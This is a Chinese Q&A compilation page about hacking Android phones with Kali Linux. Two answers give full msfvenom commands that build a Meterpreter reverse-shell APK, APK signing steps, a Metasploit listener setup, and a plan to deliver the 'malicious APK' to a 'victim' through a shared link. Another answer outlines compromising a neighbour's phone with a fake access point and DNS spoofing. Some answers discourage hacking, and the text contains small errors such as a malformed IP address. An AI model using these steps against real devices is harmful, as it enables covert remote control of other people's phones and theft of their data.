kali如何黑入安卓手机
‘壹’ kali 怎么把安卓木马隐藏到普通安卓app里
先查看kali的ip,我的是1.114
然后输入命令:msfvenom
-p
android/meterpreter/reverse_tcp
LHOST=你kali的ip
LPORT=5555
R
>
/root/apk.apk
5555是设置的端口,可以自己更改
显示这个说明已经生成成功了。
‘贰’ 怎么样才能黑一个手机
你没有办法“黑”别人的手机。即使你能制造病毒发送到别人手机上,也会被手机所带的杀毒程序拦截、清除。况且这是违法行为,会受到追究甚至惩处。
你可以拉黑对方,和对方不联系,但是不能想歪点子黑人家的手机。
‘叁’ 如何使用metasploit对安卓手机进行控制
在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。
创建负载
我们需要两台虚拟机:Kali Linux和安卓模拟器。
打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk
```
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机
LPORT 设置用来接收反弹连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。
我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。
我们可以使用如下工具进行手动签名:
l Keytool (已安装)
l jar signer (已安装)
l zipalign (需要安装)
执行下列命令签名。首先使用密钥工具创建密钥库。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`
然后使用JARsigner签名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner验证签名
jarsigner -verify -verbose -certs APPNAME.apk
`
Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
现在我们有了一个带有签名的APK,它可以安装在任何设备上。
使用Metasploit进行测试
接下来启动metasploit的监听器。执行msfconsole打开控制台。
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit
是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。
1、从https://code.google.com/archive/p/android-x86/downloads下载android x86的iso。
2、使用vmware创建一个内核版本为2.6的虚拟机。
3、挂载镜像,启动虚拟机。
4、进入Live模式。
5、设置手机并登陆谷歌帐号。
在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。
另外要允许安卓安装来历不明的apk。
切换回Kali,我们发现创建了一个新的会话。
然后你就可以为所欲为的操作这台“手机”了。
‘肆’ 如何在安卓上安装kalilinux
下载
Linux Deploy
Download VNC Viewe
2
打开属性
在distribution中选择Kali Linux
如果你在制作镜像的时候遇到了错误,把安装路径/emulated/0替换为/emulated/legacy
现在可以点击安装了
这会花很长的一段时间. 耐心等待并且确定你的手机有足够的空间
完成了?
点击START
然后打开VNC viewer应用
添加一个新的连接
Adress:
localhost
Name:
Kali
点击connect
password:
changeme
步骤阅读
欢迎来到Kali
‘伍’ Kali Linux ARM版本系统安卓手机安装求教和详解
我也在纠结这个问题......求合作
‘陆’ 怎样黑别人的手机
黑客手机并不是专门为黑客生产的手机,恰恰相反,它就是一部非常常见的Android手机(我这是一部一加手机而已),它不普通是因为它被刷入了为黑客定制的Android系统 —— 也就是说,如果你用过Android手机而且会刷机,你很容易就能DIY一部黑客手机。
如果你真的想要去尝试一下,可以参考这里的刷机教程。给手机刷入的系统名字叫 Kali NetHunter,Kali本来是黑客们在PC端常用的带有很多攻击工具的电脑操作系统,只是在手机移动端上名字叫 Kali NetHunter。在NetHunter里直接集成了很多攻击工具,对用户来说,那无非是预先安装了一些App,其中Kali Nethunter可以完成很多专业性强的攻击动作,也是其强大之处。
‘柒’ 如何黑掉蹭网者的手机或者电脑
渗透安卓系统,首先你要架设一个伪AP认对方连进来,通过抓包分析对方使用的系统与具体手机型号与安装的应用,目的是找到系统漏洞,后,通过MSF中的利用模块进行渗透,得到sheel后,就需要用安卓的Sandbox来取得root权限,这就需要用本地root漏洞进行提权攻击。
当然也可以在AP上利用DNS伪装技术,将对方访问的任意网站重点向到你的攻击机端口上,这个端口上可以用渗透攻击模块生成攻击页面,取得受限用户访问权限后就可以进行提权,完全控制对方的手机。
是不是不明白?正常的,黑对方设备不是你想的用一个什么软件一按,就大功告成,这样说的人都是骗人的,黑客是通过艰难的学习,掌握技术的前提下举一反三才能成功的。
另外建议你从路由安全着手,保护自己的设备不被非授权访问,对方进来走流量是小事,完全可以通过上述方法黑掉你。
另,如果你要学习这门技术,建议搜索metasploit与kali,这两个关键词会带你认识一些需要学习的东西。
‘捌’ 手机可以切换安卓系统和kali linux系统吗
不可以,电脑装双系统 是把系统放在一块硬盘的两个分区里,但是手机一般只有一个储存设备(闪存),所以只能安装一个系统,也就是只能刷一种android.而且kali linux一般是在pc平台上的(x86_64,或者i系列的架构上),手机如果想装的话应该需要移植,就不是一般人办得到的了(比如ubuntu就是一个团队完成的移植)
‘玖’ 一套Linux渗透教程(带你玩转Kali附安卓下Kali渗透,劫持等)(无KEY) 解压密码 谢谢!
这个教程就是个注水肉,一直逼逼歪歪,没什么实货,简直就是浪费生命